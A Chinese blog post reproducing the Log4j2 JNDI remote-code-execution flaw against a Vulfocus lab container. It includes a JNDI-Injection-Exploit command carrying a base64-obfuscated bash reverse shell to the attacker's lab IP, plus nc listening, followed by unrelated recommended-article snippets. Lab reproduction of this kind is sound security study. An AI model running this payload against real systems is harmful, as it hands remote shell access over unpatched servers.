靶场:

Vulfocus 靶场环境
目前 Vulfocus 已经集成 Log4j2 环境,可通过以下链接启动环境测试:
http://vulfocus.fofa.so/#/dashboard?image_id=3b8f15eb-7bd9-49b2-a69e-541f89c4216c
也可通过 docker pull vulfocus/log4j2-rce-2021-12-09:latest 拉取本地环境运行。

漏洞复现:

我是本地复现:
环境:
*服务器地址:kali ip(192.168.30.132)(受害机)

docker pull vulfocus/log4j2-rce-2021-12-09:latest

docker run --name log4j -p 8080:8080 vulfocus/log4j2-rce-2021-12-09:latest

*攻击机子:Windows ip(192.168.30.134)

复现过程:

在攻击机上用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar开启ldap和rmi服务。在-C后插入PowerShell(适用于windows)。 由于服务器是linux,我使用的反弹shell,用nc监听,反弹到我的攻击机(vps)上。

可参考文章:JNDI-Injection-Exploit - 走看看

java -jar '.\JNDI-Injection-Exploit-1.0-SNAPSHOT-all .jar' -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMwLjEzNC85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}" -A 192.168.30.134

如图,开启后使用EXP直接打,然后用NC监听,即可成功上线。

# 安全 # web安全
Logo
向您推荐>>Eolink开发者社区

权威|前沿|技术|干货|国内首个API全生命周期开发者社区

更多推荐

沃云统一开发平台介绍

沃云集成平台研发平台介绍1.平台优势2.平台原理3.研发平台使用方法4.遇到的问题5.现阶段实现的功能6.后续需要补充的功能和优化内容研发平台介绍1.平台优势解决孤岛式应用,实现能力共享;现有系统框架过于复杂,跨系统业务处理成本居高不下,协同服务共享,降低运维成本;提高项目应用资源监控能力,改善资源利用率;业务微服务化,快速发布、快速部署,快速响应业务需求变化;沃云平台不仅提供了自动化的、可快速部

avatar 云原生

(20200916 Solved)docker-compose up创建容器自动退出

问题描述如题,创建容器后自动退出了。并且docker start container无效解决方案原因是缺失了控制终端的配置,需要在docker-compose.yml中增加tty:true ,有时候这样也不行,需要再增加一个command:/bin/bash,命令不一定是这个,需要是一个不会退出的命令,然后用-d后台启动容器。Referencesdocker-compose启动容器后自动退出...

avatar 云原生

基于docker的test-containers环境百宝箱

笔者语录: 我开了个公众号【Java你我他】,欢迎大家关注。  在很多时候,程序猿们更关注代码本身,而不愿意把时间花费在环境搭建上,这也是Docker变得越来越受欢迎的原因之一。test-containe是Docker生态圈中的一颗新星,其 主要针对测试领域、背靠Docker实现环境百宝箱功能。  test-containers: 你要的环境,我都有~  假设我们现在需要一个redis-clust

avatar 云原生